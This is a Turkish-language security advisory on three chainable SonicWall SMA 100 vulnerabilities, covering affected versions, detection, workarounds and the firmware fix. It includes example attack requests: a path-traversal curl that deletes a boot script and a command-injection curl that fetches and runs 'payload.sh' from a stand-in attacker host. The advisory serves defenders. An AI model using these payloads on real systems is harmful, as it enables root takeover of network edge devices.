Özet
Rapid7 tarafından keşfedilen ve SonicWall tarafından doğrulanan üç kritik zafiyet, SMA 100 serisi cihazları etkileyerek zincirlenebilir bir saldırı vektörü oluşturuyor. Bu zaafiyetler bir araya getirildiğinde, kimliği doğrulanmış bir VPN kullanıcısı, cihazda root yetkileriyle komut çalıştırabilir ve kalıcı erişim elde edebilir. Özellikle edge tarafında konumlanan bu cihazların bu tür zafiyetlerle karşı karşıya olması, organizasyonlar için ciddi bir risk teşkil etmektedir.
Zafiyetlerin Teknik İncelemesi
CVE-2025-32819 – Yetkili Kullanıcı ile Dosya Silme (Arbitrary File Deletion)
- Zafiyet Türü: Path Traversal
- Açıklama: SSLVPN oturumu olan herhangi bir kullanıcı, HTTP isteklerinde
../(directory traversal) karakterleri kullanarak sistem üzerindeki keyfi dosyaları silebilir. - Etkisi: Yapılandırma dosyalarının, sistem anahtarlarının veya başlangıç betiklerinin silinmesi cihazın kullanılamaz hale gelmesine yol açabilir.
- Saldırı Örneği:
curl -k -X POST https://<sma_ip>/cgi-bin/userPortal -d "file=../../../../etc/init.d/rcS"CVE-2025-32820 – Yetkili Kullanıcı ile Dosya Yazma (Arbitrary File Write)
- Zafiyet Türü: Path Traversal / Write
- Açıklama: Kimliği doğrulanmış bir VPN kullanıcısı, belirli endpoint’ler üzerinden sistemdeki herhangi bir dizini yazılabilir hale getirebilir.
- Etkisi: Bu durum, sonraki aşamalarda saldırganın cihaz üzerine keyfi script veya binary yüklemesine imkân tanır.
- Saldırı Vektörü:
Saldırgan, HTTP POST aracılığıyla özel dizinlere script bırakabilir (örneğin/usr/bin/evil.sh).
CVE-2025-32821 – Komut Enjeksiyonu ile Uzak Kod Çalıştırma (Command Injection – RCE)
- Zafiyet Türü: Post-auth Remote Code Execution
- Açıklama: Yönetici kullanıcı (admin), cihazın CLI fonksiyonlarını kullanarak sisteme zararlı komutlar enjekte edebilir.
- Etkisi: root yetkileriyle çalışan servisler üzerinden sistem kontrolü sağlanır.
- Saldırı Örneği:
curl -k -X POST https://<sma_ip>/cgi-bin/cli -d "cmd=;curl http://attacker/payload.sh|sh"Zafiyetlerin Zincirlenmesi
Bu zafiyetler tek başına orta-yüksek seviye tehditler sunarken, zincirlenerek tam yetkili (root) shell erişimi sağlanabilir:
- CVE-2025-32819 ile sistem dosyaları silinir (örneğin: erişim kontrolleri).
- CVE-2025-32820 ile script dosyası cihaz üzerine bırakılır.
- CVE-2025-32821 ile bu script uzaktan çalıştırılır → root shell.
Etkilenme Durumunu Tespit Etme
Etkilenip etkilenmediğinizi anlamak için aşağıdaki adımları izleyebilirsiniz:
1. Sürüm Bilgisi Kontrolü:
SSH veya Web arayüzünden firmware sürümünü kontrol edin:
cat /etc/version
Eğer çıktı aşağıdakilerden biriyle eşleşiyorsa zafiyetlerden etkileniyorsunuz:
10.2.1.14-75svveya daha eski bir sürüm
2. Şüpheli Aktivitelerin İzlenmesi:
/var/logve/tmpdizinlerinde beklenmedik script dosyalarıcronveyarc.localgibi başlangıç dosyalarında değişiklik- Harici adreslere yapılan
curl,wgetgibi isteklerin loglarda görülmesi
Örnek:
-E 'curl|wget|sh' /var/log/messages
Workaround (Geçici Çözüm Önerileri)
Eğer güncelleme hemen uygulanamıyorsa aşağıdaki önlemler alınmalıdır:
- SSLVPN Servisini Geçici Olarak Devre Dışı Bırakın
Eğer kullanıcılar SSLVPN kullanmıyorsa, servis geçici olarak devre dışı bırakılabilir. - Web Arayüzüne Dışarıdan Erişimi Kısıtlayın
Management erişimi yalnızca güvenilir IP’lerle sınırlandırılmalı veya erişim VPN üzerinden sağlanmalıdır. - WAF veya IPS Cihazı ile URL/Parametre Filtreleme
../içeren URI istekleri- Komut enjeksiyonu benzeri
;,|,&&gibi karakterler
- Yedekleme ve Yapılandırma Denetimi
- Konfigürasyonlar dışa aktarılmalı
- Sistem dosyalarının hash’leri alınarak integrity kontrolü yapılmalı
Kalıcı Çözüm: Güvenlik Güncellemesi
SonicWall tarafından yayımlanan 10.2.1.15-81sv sürümü, tüm bu zafiyetleri gidermektedir. En kısa sürede firmware güncellemesi yapılmalıdır.
Güncelleme rehberi için:
👉 SonicWall SMA Güncelleme Dokümantasyonu
Etkilenen Ürün ve Sürümler
| Ürün Modeli | Etkilenen Sürümler |
|---|---|
| SMA 200 | 10.2.1.14-75sv ve öncesi |
| SMA 210 | Aynı |
| SMA 400 | Aynı |
| SMA 410 | Aynı |
| SMA 500v | Aynı |
Not: SMA 1000 serisi bu açıklardan etkilenmemektedir.
Not: “SMA 100” bir ürün modeli değil, yukarıdaki cihazların ait olduğu seri adıdır. SMA 1000 serisi bu açıklardan etkilenmemektedir.
Sonuç
SMA cihazları genellikle VPN ve erişim yönetimi için ağın en dış katmanında konumlanır. Bu da onları saldırganlar için cazip bir hedef haline getirir. Bu tür zincirlenebilir zafiyetler özellikle APT gruplarının ilgisini çeker.
Kurumsal güvenliğinizi sağlamak için:
✅ Firmware’inizi güncelleyin
✅ MFA ve IP bazlı erişim sınırlaması getirin
✅ WAF / IPS koruması sağlayın
✅ Log ve yapılandırma dosyalarını sıkı şekilde izleyin
Birlikte Güvende Olalım!
#CyberSecurity #NetworkSecurity #Vulnerability #RCE #SonicWall
